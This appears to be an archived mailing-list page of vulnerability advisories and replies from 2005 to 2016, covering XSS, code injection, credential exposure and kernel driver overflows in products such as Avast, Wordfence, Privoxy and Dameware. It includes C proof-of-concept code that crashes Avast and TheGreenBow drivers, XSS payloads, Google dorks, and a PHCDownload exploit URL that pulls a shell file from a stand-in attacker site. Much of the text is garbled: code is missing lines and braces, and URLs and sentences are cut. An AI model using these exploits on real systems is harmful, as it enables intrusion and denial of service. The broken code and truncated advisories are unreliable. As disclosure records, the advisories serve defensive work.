[CVE-2016-2345] Solarwinds Dameware Mini Remote Control Remote Code Execution Vulnerability

2016-03-18 Thread contact
Document Title:
Solarwinds Dameware Mini Remote Control Remote Code Execution Vulnerability

References (Source):


Release Date:

Product & Service Introduction:
Solarwinds Dameware Mini Remote Control allows for the remote administration of 
client systems of various operating system and architecture. 

Vulnerability Information:
Class: CWE-121: Stack-based Buffer Overflow
Impact: Remote Code Execution, Denial of service
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2016-2345

Vulnerability Description:
A certain remote message parsing function inside the Dameware Mini Remote 
Control service does not properly validate the input size of an incoming string 
before passing it to wsprintfw.  As a result, a specially crafted message can 
overflow into the bordering format field and subsequently overflow the stack 
frame. Exploitation of this vulnerability does not require authentication and 
can lead to SYSTEM level privilege on any system running the dwmrcs daemon.

Vulnerability Disclosure Timeline:
2015-12-17: Contact Solarwinds and Request Security Contact Info From Support 
2015-12-22: Vendor Sends Link to Recent Patches, Denies Security Contact Info 
2015-12-29: Notify Vendor Patches Are Unrelated, Offer POC, & Request Contact 
with Security Team Again
2016-12-31: Vendor Replies That “Details” Were Forwarded To Developers Although 
None Have Been Requested Or Given Yet
2016-01-08: Follow-up with Vendor; Send POC for Developers
2016-01-08: Vendor Confirms Reciept of POC & Forwards to Developers
2016-01-20: Enlist US-CERT Assistance with Vendor
2016-01-20: Vendor Asks If We Will Test A Patch; We Confirm With Vendor
2016-02-04: Follow-Up with Vendor to Receive Patch
2016-02-04: Vendors Sends Patch
2016-02-04: Notify Vendor Patch Consists of a NX Recompile. Notify Vendor of 
Workarounds & Urge For Actual Fix. Request Contact Info For Developers Again
2016-02-04: Vendors Forwards to Developers
2016-02-14: Update US-CERT on Progress. They Attempt to Contact Vendor Security 
Team Independantly
2016-03-03: Follow-up With Vendor
2016-03-03: Vendor Requests Remote Access to Our System
2016-03-04: Request Denied. We Suggest Several Trivial Potential Fixes For 
Vulnerability & Notify Of Impending 90 Disclosure Date
2016-03-08: Vendor Forwards to Developers
2016-03-17: Coordinated Public Disclosure with US-CERT

Affected Product(s):

Solarwinds Dameware Mini Remote Control 12.0 ( previous versions have not been 
verified )

Severity Level:

Proof of Concept (PoC):
A proof of concept will not be provided at this time.

Solution - Fix & Patch:
There is currently no patch. Please block remote access to port 6129 at a 

Security Risk:
The security risk of this remote code execution vulnerability is estimated as 
high. (CVSS 10.0)

Credits & Authors:
Securifera, Inc - b0yd

Disclaimer & Information:
The information provided in this advisory is provided as it is without any 
warranty. Securifera disclaims all warranties, either expressed or implied, 
including the warranties of merchantability and capability for a particular 
purpose. Securifera is not liable in any case of damage, 
including direct, indirect, incidental, consequential loss of business profits 
or special damages, even if Securifera or its suppliers have been advised 
of the possibility of such damages. Some states do not allow the exclusion or 
limitation of liability for consequential or incidental damages so the 
limitation may not apply. We do not approve or encourage anybody to break any 
licenses, policies, or hack into any systems.

Domains: www.securifera.com
Contact: contact [at] securifera [dot] com
Social: twitter.com/securifera

Copyright © 2016 | Securifera, Inc

WordPress Wordfence Firewall 5.1.2 Cross Site Scripting

2014-11-05 Thread bhati . contact
WordPress Wordfence Firewall plugin version 5.1.2 suffers from a cross site 
scripting vulnerability.

Product: Wordfence Firewall Plugin For Wordpress 
Vendor: Wordfence
Vulnerable Version(s): 5.1.2
Tested Version: 5.1.2
Advisory Publication:  June 30, 2014  [without technical details]
Vendor Notification: June 24, 2014 
Vendor Patch: June 29, 2014 
Public Disclosure: June 30, 2014 
Vulnerability Type:Reflected Cross-Site Scripting
CVE Reference: CVE-2014-4664
Risk Level: High
Solution Status: Fixed by Vendor
Reported By  - Narendra Bhati ( R00t Sh3ll)
Security Analyst  @ Suma Soft Pvt. Ltd. ( IT Risk & Security Management 
Services , Pune ( India)
Facebook - https://facebook.com/narendradewsoft
twitter - https://www.twitter.com/NarendraBhatiNB
Blog - http://hacktivity.websecgeeks.com
Email - bhati.cont...@gmail.com


Advisory Details:

Narendra Bhati discovered vulnerability in Wordfence Firewall Plugin For 
Wordpress , which can be exploited to perform Cross-Site Scripting (XSS) 

1) Reflected Cross-Site Scripting (XSS) in Wordfence Firewall Plugin For 
Wordpress : CVE-2014-4664

The vulnerability exists due to insufficient sanitization of input data passed 
via the "whoisval" HTTP GET parameter to 
""; URL. A 
remote attacker can trick a logged-in administrator to open a specially crafted 
link and execute arbitrary HTML and script code in browser in context of the 
vulnerable website.
This vulnerability can be used against website administrator to perform 
phishing attacks, steal potentially sensitive data and gain complete control 
over web application.

The exploitation example below uses the "";alert(/Oooppps !!! 
Bhati Got A XSS In WordPress Popular Firewall Plugin Word Fence /)" 
JavaScript function to display "Oooppps !!! Bhati Got A XSS In WordPress 
Popular Firewall Plugin Word Fence" word:";;alert(/Oooppps
 !!! Bhati Got A XSS In WordPress Popular Firewall Plugin Word Fence /)


Update to " 5.1.4" From his official website or update from wordpress dashboard

More Information:
Vendor Public Advisory
Full Disclosure With Technical Details - 

Modx CMS CSRF Bypass & XSS Vulnerabilities

2014-11-04 Thread bhati . contact
Public Disclosure -
Product: MODX Revolution
Severity: Critical
Versions: 2.0.0–2.2.14
Vulnerability type: CSRF & XSS
Report date: 2014-Jul-10
Fixed date: 2014-Jul-15

A significant vulnerability was discovered in the Manager login of MODX 
Revolution that also affects the use of the Login Extra. A malicious user could 
formulate a link that automatically logs the user into their own account, then 
redirects the user to a site the attacker controls immediately, exposing the 
user's CSRF token. This can be exploited with or without getting the user to 
enter their credentials in the form.

Affected Releases
All MODX Revolution releases prior to and including 2.2.14.

Upgrade to MODX Revolution 2.2.15. Due to the nature of this issue and the 
number of files requiring changes the solution is to upgrade. No installable 
patch or fileset is available for prior versions.

[HTTPCS] ClanSphere 'where' Cross Site Scripting Vulnerability

2014-03-07 Thread contact

HTTPCS Advisory : HTTPCS127

Product : ClanSphere

Version : 2011.4

Date : 2014-03-07

Criticality level : Less Critical

Description : A vulnerability has been discovered in ClanSphere, which can be 
exploited by malicious people to conduct cross-site scripting attacks. Input 
passed via the 'where' parameter to '/index.php' is not properly sanitised 
before being returned to the user. This can be exploited to execute arbitrary 
HTML and script code in a user's browser session in context of an affected site.

Page : /index.php

Variables : sort=6&action=list&where=[VulnHTTPCS]&mod=users

Type : XSS

Method : GET

Solution :

References : https://www.httpcs.com/advisory/httpcs127

Credit : HTTPCS [Web Vulnerability Scanner]

Twitter : http://twitter.com/HTTPCS
Web vulnerability scanner HTTPCS : https://www.httpcs.com/

Privoxy Proxy Authentication Credential Exposure - CVE-2013-2503

2013-03-12 Thread contact
Privoxy Proxy Authentication Credential Exposure

Product: Privoxy
Project Homepage: privoxy.org
Advisory ID: c22-2013-01
Vulnerable Version(s): 3.0.20 (and possibly prior)
Tested Version: 3.0.20-1 (tested using Debian Sid)
Vendor Notification: March 6, 2013
Public Disclosure: March 11, 2013
Vulnerability Type: Insufficiently Protected Credentials [CWE-522]
CVE Reference: CVE-2013-2503
Risk Level: Medium
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
Discovery: Chris John Riley ( http://blog.c22.cc )

Advisory Details:

During research into browser and proxy server handling of HTTP
Response Codes, an issue with the way that Privoxy handles HTTP
Response code 407 "Proxy Authentication Required" was discovered.
Privoxy in versions 3.0.20 (and possibly prior) ignores the presence of
"Proxy-Authenticate" and "Proxy-Authorization" headers and allows these
values to be passed to and from a remote server without modification.
The resulting behavior could allow a malicious websites to spoof a
Proxy-Authentication response appearing to originate from the Privoxy
service. The Privoxy user will then be prompted for a username and
password that appears to originate from the Privoxy software.


1) A Privoxy user visits a website using a browser of their choice
2) The remote website responds to the request with a 407 "Proxy
Authentication Required" HTTP response code and the appropriate
"Proxy-Authenticate: Basic" HTTP response header
3) This response is passed through the Privoxy service without
modification to the users browser
4) As the browser is configured to use a proxy server, the browser
believes that the upstream proxy (Privoxy) has requested
authentication and prompts the user for a username and password. This
prompt states that the proxy server at "" requires
authentication (this prompt may vary if Privoxy is running on a
machine other than localhost and/or on a non-default port number)
5) If the user enters a username and password, the browser will send
a request through Privoxy to the remote website with a
"Proxy-Authorization: " HTTP request header (where XXX is
a base64 encoded version of the username and password the user
entered at the browsers proxy authentication prompt)
6) The remote website receives this header and can store or re-use
these captured credentials

Proof of Concept:


The above URL will respond with a "Proxy-Authenticate: basic" header
when a request is received that does no contain a
"Proxy-Authorization" header. This will prompt the users browser to
request a username/password from the user. If you enter a value in the
username/password box and click ok, it will send a Base64 encoded
version to the remote website (the server will display the response
headers at the bottom of the resulting page under request headers (one
of the values will be "Proxy-Authorization" with a base64 encoded
version of the entered username/password). For a full walkthrough it
is suggested to capture this in your favourite packet capture program
and walk through the requests to view the entire process.

Note --> The above POC does not store any data sent to the server,
however it is suggested to use bogus credentials if testing this proof of


The following solution was suggested and implemented in Privoxy 3.0.21

Proxy authentication headers are removed unless the new directive
enable-proxy-authentication-forwarding is used. Forwarding the headers
potentionally allows malicious sites to trick the user into providing
it with login information.

Privoxy 3.0.21 ChangeLog -->

Vulnerability Timeline:

March 5, 2013 20:00 - Initial discovery of vulnerability
March 6, 2013 14:48 > Emailed Privoxy developer list to request a
security contact
March 6, 2013 15:26 < Received response with dedicated security contact
March 6, 2013 16:01 > Emailed details of the vulnerability to security
March 6, 2013 17:19 < Received response acknowledging issue. Fix
indicated in upcoming release
March 6, 2013 18:38 > Acknowledged receipt of email and advised of
updated CVSSv2 score
March 7, 2013 15:50 < Received response detailing proposed fix,
including link to CVS check-in of new code
March 7, 2013 18:48 > Acknowledged receipt of email
March 9, 2013 16:54 > Emailed CVE number to security contact and
requested information on release plans
March 10, 2013 14:28 < Received confirmation of release timeline
March 10, 2013 14:58 - Release of Privoxy 3.0.21 stable
March 11, 2013 07:45 - Release of advisory

Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation

2009-11-16 Thread contact . fingers

=[Avast aswRdr.sys Kernel Pool Corruption and Local
Privilege Escalation]

Author(s): Giuseppe 'Evilcry' Bonfa'
AbdulAziz Hariri

E-Mail: evilcry {AT} GMAIL {DOT} COM
Website:   http://evilcry.netsons.org

Copyright 2009 Giuseppe Bonfa'. All rights reserved.

***Disclosure Timeline***

Discover Date: -
PoC Code: porting C++ 26/09/2009
Vendor Notify: 26/09/2009
Vendor Reply: 15/09/2009
Vendor Fix: 15/10/2009

Product Details:

Affected Product: Avast antivirus (other versions could be affected)
Product Version: 4.8.1356.0
Vulnerable Compoonent: aswRdr.sys 4.8.1356.0 (avast! TDI RDR Driver)
Category: Local Denial of Service due to kernel memory corruption (BSOD)
  (untested) Local Privilege Escalation

Notes: Tested on XP Sp0-Sp2 fixed faulting process IExplorer 6

Vulnerability Details:

Avast's aswRdr.sys Driver does not sanitize user supplied input
IOCTL) and this lead to Kernel Heap Overflow that propagates
on the system with a BSOD and potential risk of Privilege Escalation.

Technical Details:

kd> !analyze -v


Arg1: 0020, a pool block header size is corrupt.
Arg2: 8136c618, The pool entry we were looking for within the page.
Arg3: 8136c778, The next pool entry. <-- OVERWRITTEN HEADER
Arg4: 1a2c0001, (reserved)

POOL_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd

WARNING: Stack unwind information not available. Following frames may be
f7c70a18 80543c86 0019 0020 8136c618 nt+0x21925
f7c70a68 804f388c 8136c620  81571de8 nt+0x6cc86
f7c70abc 804fcfbf 81571de8 f7c70b08 f7c70afc nt+0x1c88c
f7c70b0c 806d1c35   f7c70b24 nt+0x25fbf
f7c70b24 806d1861 badb0d00  81603548 hal+0x2c35
f7c70bb4 804f0498 81571de8 81348028  hal+0x2861
f7c70be8 f76ee9ad 81347ec8 81565740  nt+0x19498
f7c70c1c f76ee333 81347ec8 81571da8 81664e28 aswRdr+0x9ad
f7c70c58 805749d1 81347ec8 81571da8 81348028 aswRdr+0x333
f7c70d00 8056d33c 001c   nt+0x9d9d1
f7c70d34 8053c808 001c   nt+0x9633c
f7c70d64 7c91eb94 badb0d00 0012fee0 04040404 nt+0x65808
f7c70d68 badb0d00 0012fee0 04040404 04040404 0x7c91eb94
f7c70d6c 0012fee0 04040404 04040404  0xbadb0d00
f7c70d70 04040404 04040404   0x12fee0
f7c70d74 04040404    0x4040404
f7c70d78     0x4040404

Proof of Concept:

Exploitation for Privilege Escalation is not Trivial but Possible

/* Avast 4.8.1356.0 antivirus aswRdr.sys Kernel Pool Corruption
* Author(s): Giuseppe 'Evilcry' Bonfa'
*AbdulAziz Hariri
* E-Mail: evilcry _AT_ gmail _DOT_ com
* Website: http://evilcry.netsons.org
*  http://evilcodecave.blogspot.com
*  http://evilcodecave.wordpress.com
* http://evilfingers.com
*  Disclosure Timeline: As specified in the Advisory.


BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice) //taken from esagelab
 WCHAR DeviceName[MAX_PATH];
 HANDLE hDevice;

 if ((GetVersion() & 0xFF) >= 5)
  wcscpy(DeviceName, L".\\Global\\");
  wcscpy(DeviceName, L".\\");

 wcscat(DeviceName, DriverName);

 printf("Opening.. %S\n", DeviceName);

 hDevice = CreateFileW(DeviceName, GENERIC_READ | GENERIC_WRITE, 0,

  printf("CreateFile() ERROR %d\n", GetLastError());
  return FALSE;

 *lphDevice = hDevice;

 return TRUE;

int main()
 DWORD Junk;

  printf("Unable to access aswMon");

 char *Buff = (char *)VirtualAlloc(NULL, 0x156, MEM_RESERVE |

 if (Buff)
  memset(Buff, 'A', 0x156);

  printf("DeviceIoControl Executed..\n");
  printf("VirtualAlloc() ERROR %d\n", GetLastError());



Vulnerability found and advisory written by Giuseppe 'Evilcry' Bonfa'
and AbdulAziz Hariri.


The information within this advisory may change without notice. Use of this 
information constitutes acceptance for use in an AS IS condition. There are no 
warranties, implied or express, with regard to this information. In no event 
shall the author be liable for any direct or indir

Avast aswMon2.sys kernel memory corruption and Local Privilege Escalation.

2009-09-23 Thread contact . fingers

---[Avast aswMon2.sys kernel memory corruption and Local Privilege 

Author: Giuseppe 'Evilcry' Bonfa'
E-Mail: evilcry {AT} GMAIL {DOT} COM
Website: http://evilcry.netsons.org

***Disclosure Timeline***
Discover Date: Sep 13, 2009  PoC Code: Sep 13, 2009
Vendor Notify: Sep 15,2009   Vendor Reply: Sep 15, 2009

After various mails about publishing date
ignored, here the Public Disclosure.

Product: Avast antivirus 4.8.1351.0 (other versions could be affected)
Affected Component: aswMon2.sys 4.8.1351.0
Category: Local Denial of Service due to kernel memory corruption (BSOD)
 (untested) Local Privilege Escalation



Avast's aswMon2.sys Driver does not sanitize user supplied input IOCTL) and 
this lead to a kernel memory corruption that propagates 
on the system with a BSOD and potential risk of Privilege Escalation.

00010F70cmp [ebp+arg_C], 288h   ;InBuff Len no other checks 
00010F77jnz loc_111AC
00010F7Dmov esi, [ebp+SourceString]
00010F80cmp [esi], ebx
00010F82mov [ebp+arg_C], ebx

Affected IOCTL is B2C80018




WARNING: Stack unwind information not available. Following frames may be 
f76f3234 8053d251 f76f3250  f76f32a4 nt+0x600fa
f76f32a4 8052c712 badb0d00 20a0a0a1 f76f5658 nt+0x66251
f76f3328 8052c793 41414141  f76f377c nt+0x55712
f76f33a4 804fc700 f76f377c f76f3478 05050505 nt+0x55793
f76f56d8 f7756a04 badb0d00 8055b256  nt+0x66251
f76f576c 41414141 41414141 41414141 41414141 aswMon2+0xa04
f76f5770 41414141 41414141 41414141 41414141 0x41414141
f76f5774 41414141 41414141 41414141 41414141 0x41414141
f76f5778 41414141 41414141 41414141 41414141 0x41414141
f76f577c 41414141 41414141 41414141 41414141 0x41414141
f76f5780 41414141 41414141 41414141 41414141 0x41414141


/ * Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption
 * Author: Giuseppe 'Evilcry' Bonfa'
 * E-Mail: evilcry _AT_ gmail _DOT_ com
 * Website: http://evilcry.netsons.org
 *  http://evilcodecave.blogspot.com 
 *  http://evilfingers.com
 * Vendor: Notified
 * No L.P.E. for kiddies
 * /

#include < windows.h>
#include < stdio.h>

BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice) //taken from esagelab
HANDLE hDevice;

if ((GetVersion() & 0xFF) >= 5) 
wcscpy(DeviceName, L".\\Global\\");
wcscpy(DeviceName, L".\\");

wcscat(DeviceName, DriverName);

printf("Opening.. %S\n", DeviceName);

hDevice = CreateFileW(DeviceName, GENERIC_READ | 

printf("CreateFile() ERROR %d\n", GetLastError());
return FALSE;

*lphDevice = hDevice;

return TRUE;

int main()

printf("Unable to access aswMon");

char *Buff = (char *)VirtualAlloc(NULL, 0x288, MEM_RESERVE | 

if (Buff)
memset(Buff, 'A', 0x288);
printf("DeviceIoControl Executed..\n"); 
printf("VirtualAlloc() ERROR %d\n", GetLastError());



Giuseppe 'Evilcry' Bonfa'

TheGreenBow VPN Client tgbvpn.sys DoS and Potential Local

2009-08-17 Thread contact . fingers
Original Advisory Link: 

---[TheGreenBow VPN Client tgbvpn.sys DoS and Potential Local
Privilege Escalation]->

Author: Giuseppe 'Evilcry' Bonfa'
E-Mail: evilcry {AT} GMAIL {DOT} COM
Website: http://evilcry.netsons.org
 http://malwareAnalytics.com [under construction]

Release Date: 15/08/2009

Product: TheGreenBow VPN Client 4.61.003  (other versions could be affected)
Affected Component: tgbvpn.sys
Category: Local Denial of Service (BSOD)
 (untested) Local Privilege Escalation



TheGreenBow's tgbvpn.sys Driver does not sanitize user supplied input
and this lead to a Driver Collapse that propagates on the system with a
and potential risk of Privilege Escalation.

Affected IOCTL is 0x8034


WARNING: Stack unwind information not available. Following frames may be
ef1cabf4 841d36a8 ef1cac58 841d36a8 f42dd895 tgbvpn+0x9f51

 * Author: Giuseppe 'Evilcry' Bonfa'
 * E-Mail: evilcry {AT} gmail. {DOT} com
 * Website: http://evilcry.netsons.org
 * http://evilcodecave.blogspot.com
 * http://evilcodecave.wordpress.com
 * http://evilfingers.com
 * http://malwareAnalytics.com [under construction]


int main(void)
   HANDLE hDevice;
   DWORD Junk;

   printf("\n .:: TheGreenBow DoS Proof of Concept ::.\n");

   hDevice = CreateFileA(".\\tgbvpn",

   if (hDevice == INVALID_HANDLE_VALUE)
   printf("\n Unable to Device Driver\n");
   return EXIT_FAILURE;

   DeviceIoControl(hDevice, 0x8034,(LPVOID) 0x8001, 0, (LPVOID)
0x8002, 0, &Junk, (LPOVERLAPPED)NULL);

   return EXIT_SUCCESS;


Giuseppe 'Evilcry' Bonfa'

JibberBook GuestBook 2.3 Multiple Vulnerabilities

2009-08-12 Thread contact


[»] Script: [ JibberBook  ]

[»] Language:   [ PHP ]

[»] Website:[ http://jibberbook.com ]

[»] Founder:[ Onur YILMAZ aka DJR ]

[»] Site:   [ www.onuryilmaz.info ]



=== [ data source of comments disclosure (.xml file) ] ===

[»] [JibberBook]/data_layer/xml/comments.xml

=== [ output ] ===



 Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) 
AppleWebKit/530.5 (KHTML, like Gecko) Chrome/ 




=== [ HTML Code Injection ] ===

[»] add new message



=== [ Google Dork ] ===

[»] "JibberBook created by"



Blogsa <= 1.0 Beta 3 XSS Vulnerability

2009-03-02 Thread contact

# Software: Blogsa <= 1.0 Beta 3 XSS Vulnerability#
# Software Site: blogsa.net   #
# Discovered by: Onur YILMAZ aka DJR  #
# Blog: http://www.onuryilmaz.info#
# E-mail: contactonuryilmazinfo  #


# Screen

This message was sent using IMP, the Internet Messaging Program.

Afian Document Manager Local File Inclusion

2009-03-02 Thread contact
Afian is an application that can add, in just minutes, powerful document 
management capabilities to any Web server. It provides an Web-based interface 
for documents residing on the Web server's file system.

This software has a secutity hole allow attackers download any files if they 
know the path.

Vendor: afian.com
Vulnerabilities: Bypass + Fullpath Disclosure + Local File Inclusion.
Version: Unknown (maybe 2.x.x)
Demo: http://demo.afian.com

Google Dork: Afian document manager

1. Bypass+Fullpath Disclosure:
It doesn't ask username/password and display fullpath.
2. Local File Inclusion: Read any files if know exactly path_of_file

PHCDownload 1.1.0 Vulnerabilities

2009-02-20 Thread contact
A file content management and manipulation system unlike any other available on 
the market today, with unique innovations, tools, and design, customising and 
producing your database is made easy.

PHCDownload has been designed for integration into existing websites with its 
highly customisable interface and editable language file system.

Vendor: http://www.phpcredo.com

Version: 1.1.0 and older

Vuls file: seach.php

Descripton: It is like remote file inclusion but you can run PHP code browser 
address. I don't know what is called.

Exploit: http://[site]/[path_to_script]/search.php

Input: ">< 

Example: http://[site]/[path_to_script]/search.php?string=";>< http://attacker_site/SHELL_FILE";); ?>

PGP Desktop 9.0.6 Denial Of Service - ZeroDay

2008-12-24 Thread contact . fingers
PGP Desktop 9.0.6 Denial Of Service Vulnerability.

Version Affected:
PGP Desktop 9.0.6 [Build 6060] (other version could be affected)

Component Affected:

Release Date:
Release Date. 23 December ,2008

PGP Desktop 's PGPweded.sys Driver does not sanitize user supplied input 
(IOCTL) and this lead to a Driver Collapse that propagates on the system with a 
BSOD. Affected IOCTL is 0x80022038.


Giuseppe 'Evilcry' Bonfa' (Team Lead, www.EvilFingers.com / 

The information in the advisory is believed to be accurate at the time of 
publishing based on currently available information. Use of the information 
constitutes acceptance for use in an AS IS condition. There is no 
representation or warranties, either express or implied by or with respect to 
anything in this document, and shall not be liable for a ny implied warranties 
of merchantability or fitness for a particular purpose or for any indirect 
special or consequential damages.


Re: PHPSlideShow (toonchapter8.php) Cross-Site Scripting Vulnerability

2008-04-16 Thread contact
The file specified ("toonchapter8.php") has NEVER existed in FMDeluxe or any 
other script created by WSDeluxe. 

This is a false vulnerability report, and should be removed.

WASC-Articles: 'The Importance of Application Classification in Secure Application Development'

2007-04-17 Thread contact
The Web Application Security Consortium is proud to present 'The Importance of 
Application Classification in Secure Application Development' by Rohit Sethi. 
In this article Rohit describes the importance of Application Classification 
during the secure development process.

This document can be found at http://www.webappsec.org/projects/articles/ .


- Robert Auger


Are you interested in writing a 'Guest Article' for the WASC? Additional 
on article guidelines may be found at http://www.webappsec.org/articles/. 
can be sent to articles_at_webappsec.org

"Contributed articles may include industry best practices, technical 
information about
current issues, innovative defense techniques, etc. NO VENDOR PITCHES OR 
GIMMICKS PLEASE. We are only soliciting concrete information from the experts 
on the
front lines of the web application security field."

Metaye Released - ZmbScap

2007-02-20 Thread Contact


Metaeye has released new project Zmbscap as:

The zombie scapper is an automated perl tool for detecting and stopping 
denial of service programs. The tool automatically searches and scans 
the desired target
for programs by looking for the ports that are used by the zombie 
masters. It stops the

zombie masters by sending a kill/stop trigger.

You can find the tool at:


[MSG] Metaeye Security Group

Re: DotClear v1.2.5

2007-02-20 Thread contact
So what ?

Even with register_globals = On it ends with a PHP error, nothing more.

Where's your exploit? There's nothing on your site.

I may have missed something and I'd like to thank you to warn us before the 
reste of the world.

Olivier Meunier

SQID v0.2 - SQL Injection Digger.

2006-12-22 Thread contact
SQL injection digger is a command line program that looks for SQL
injections and common errors in websites.Current version looks for SQL 
injections and common errors in website urls found by performing 
a google search.

The use of google search SOAP API has been removed due to no more issuing of 
keys. Now it directly performs search over the web.

Sqid can be downloaded from http://sqid.rubyforge.org.

MSG // http://www.metaeye.org

SQID v0.1 - SQL Inhection Digger.

2006-12-21 Thread contact
SQL injection digger is a command line program that looks for SQL injections 
and common errors 
in websites.Current version looks for SQL 
injections and common errors in website urls found by performing a google 

Sqid can be downloaded from http://sqid.rubyforge.org.

MSG // http://www.metaeye.org

Re: AFCommerce Shopping Cart

2006-07-22 Thread contact
Hi, thank you for reporting this problem. I am Paul, the author of the 
software, so I would like to do everything possible to correct this issue. The 
free version of my software is not open source, and not that the encryption is 
protecting it very well, I'm sure a good hacker could crack the encryption, but 
the point is to not let the security features be readable to everyone, so 
hopefully it will lessen problems like this. 

Ok, so with that said, I tested the classic 'or 1=1 on my demo store, and 
nothing was returned. It said no matching results, so are you sure this worked 
for you ? I know I am not perfect in any way so I will always look in to this 
stuff, but when I first read your post I was confused because I attacked my own 
site for hours checking for that exact kind of attack. 

I don't like to publicly post too much info about how and why I set things up, 
as to not give anyone any ideas on how to attack my software, but the search 
feature (I thought) would not be attackable. Now since you did it already, I 
may be wrong, but I do not use the keywords inside the sql statement. For 
example, I do not use anything like: select * from products where name = 
'userinputvariable'. I have some security functions set up to clean user input, 
if you know the software, its afc_secure_string_POST. In the search script, I 
use that function for all input EXCEPT the keywords, but that is because the 
keywords are not used at all in sql statements (actually none of the input is). 
Basically, I break the keywords down in to separate words (explode by spaces), 
then I do my own sql select statements (without any user input at all) and 
simply check to see if the words match. There is more to my search than that, 
but for this topic that is all that matters. So if someone were
  to type in any sql injection code, that code would never be queried. Your 'or 
1=1 would simply be stored in an array, in your example it would consider it 2 
different words (if you didn't use the space it would be one keyword), but the 
only time that word would be used is in a substr_count statement, which can not 
do any damage. If this problem does exist, please report back what i am missing 
from your comment, but since it did not work for me just now, and also since 
the keywords never hit an sql statement, at this point I will disagree with 
you. Also make sure you did this on my current demo store, which uses version 
2.5. I know that version 1 sucked as far as validation was concerned. I first 
released the code just to see if anyone would use it, so it was done quickly, 
but after I had a small following, I added a whole bunch of security features 
in version 2, and validated EVERYTHING (I hope). Feel free to mess with my demo 
store, http://crinicart.com , just please do no
 t attack my server or do any damage. As for now, I see your comments as 
helping the project find holes, which is great, I do want it to be perfect. So 
if you find something I will be more than willing to listen, just please do not 
do any damage to prove a point. Its not necessary since I will try out anything 
that comes up.

Your second point about the reviews, I am about to test that now. With this, 
you are probably correct. I had more validation in there, but people complain 
when I did that because they couldn't add html. I though text only was fine, 
but I wanted to make people happy. I am probably going to take out all < and > 
symbols. It does check for normal php tags, but I guess someone could still use 
a script html tag for php attacks. So since it currently allows html I agree 
someone could deface the site, but only when reading the attacked review, and 
since most users do not use that feature, I didn't see it as a big deal. Also, 
the review is escaped with mysql_real_escape_string and a few other things. the 
only way this could be perfect is to strip all html tags, and that was already 
in my mind to do.

I'd like to hear what you think, as well as, anyone else with an opinion about 
your comments (and mine). If a problem is found, it will be fixed the next day, 
but its tough to be the only developer of software used by many people because 
I get all kinds of developers telling me something is written poorly just to 
feel better about themselves. You sound like you know what you are talking 
about, so I took your comments seriously. If you are correct, like I said I 
will fix it and thank you. If you are not, I would like to clear it up so my 
users do not become scared, or hurt my creditibility.

Thank you,

Paul Crinigan

Re: vbulletin.com Multiple XSS Vulnerabilities

2006-06-13 Thread contact
These XSS vulnerabilities have all been detected and patched.

Announcement: The Web Hacking Incidents Database

2006-03-28 Thread contact
"The web hacking incident database (WHID) is a Web Application Security 
Consortium project
dedicated to maintaining a list of web applications related security incidents. 
The goal
is to serve as a tool for raising awareness of the web application security 
problem and
provide the information for statistical analysis of web applications security 


For further information please contact Ofer Shezaf ([EMAIL PROTECTED]), the 
project leader.


- Robert Auger


The Web Security Mailing List

The Web Security Mailing List Archives

Announcement: WASC Threat Classification in German

2006-03-06 Thread contact
Web Application Security Consortium (WASC) Announcement

We're proud to present the german translation of the Threat Classification. On 
behalf of WASC,
we'd like to thank the following for their hard work and contribution:

Achim Hoffmann
Albert Caruana
Stefan Strobel
Daniela Strobel



- Robert Auger

The Web Security Mailing List

The Web Security Mailing List Archives

Announcement: Domain Contamination By Amit Klein

2006-02-06 Thread contact
The Web Application Security Consortium is proud to present 'Domain 
Contamination' written 
by Amit Klein. In this article Amit discusses how an attacker who's hijacked a 
domain for a
short period of time can still retain control of its audience long after the 
domain is 
returned to its rightful owner.

This document can be found at 


- Robert Auger


Are you interested in writing a 'Guest Article' for the WASC? Additional 
information on 
article guidelines may be found at http://www.webappsec.org/articles/. Inquires 
can be sent 
to articles_at_webappsec.org

"Contributed articles may include industry best practices, technical 
information about 
current issues, innovative defense techniques, etc. NO VENDOR PITCHES OR 
PLEASE. We are only soliciting concrete information from the experts on the 
front lines of 
the web application security field."

Announcement: The Web Application Firewall Evaluation Criteria v1 Released

2006-01-17 Thread contact
The Web Application Firewall Evaluation Criteria project is proud
to announce v1.0 of The Web Application Firewall Evaluation Criteria
(WAFEC), its first official release.

WAFEC is a result of a collaboration between web application
firewall vendors and independent security professionals to create a
comprehensive, vendor-neutral, web application firewall evaluation
criteria. The resulting framework can be used to evaluate and
and compare web application firewalls.

WAFEC v1.0 can be downloaded from the project home page:


Participation in WAFEC is open to the interested parties. To comment
on the work done so far or join the effort contact Ivan Ristic, the
WAFEC project leader.



The Web Security Mailing List

The Web Security Mailing List Archives

Airscanner Mobile Security Advisory #05083102 Spb Kiosk Engine Program Bypass

2005-12-29 Thread contact . removethis
Airscanner Mobile Security Advisory #05083102:
Spb Kiosk Engine Program Bypass

Kiosk Engine

Tested on Windows Mobile Pocket PC 2003

Mobile device running Windows Mobile Pocket PC with Kiosk Engine 

Seth Fogie
Airscanner Mobile Security
Mobile Antivirus Researchers Association
August 30 2005

Risk Level:
Medium. Local attacker gains unauthorized control over device.

Spb Kiosk Engine allows you to run your custom application(s) in kiosk mode. In 
this mode, the target applications are the only ones that can be used on a 
specific Pocket PC device.

The core Kiosk Engine is executed from the \windows\startup folder when the PDA 
boots. This ensures that the device is locked down and basically keeps a person 
from using other programs on the PDA. However, it is still possible to execute 
programs via 'features' of the running appliaction (eg. Pocket Word will 
execute programs via hyperlink - file://\windows\calc.exe). In addition, 
autorun is still enabled on the devices, which allows anyone with a SD Card or 
CF card to execute their own code on the device. Using this backdoor, we were 
able to overwrite the administrator passcode and alternately, remove the 
KioskEngine software altogether.

Disable autorun on the device by placing an autorun.exe file in the \windows 
directory with read-only options.

Vendor Response
Waiting response.

Weblinks for advisories 05083101 and 05083102 


Copyright (c) 2005 Airscanner Corp.

Permission is granted for the redistribution of this alert electronically. It 
may not be edited in any way without the express written consent of Airscanner 
Corp. If you wish to reprint the whole or any part of this alert in any other 
medium other than electronically, please contact Airscanner Corp. for 

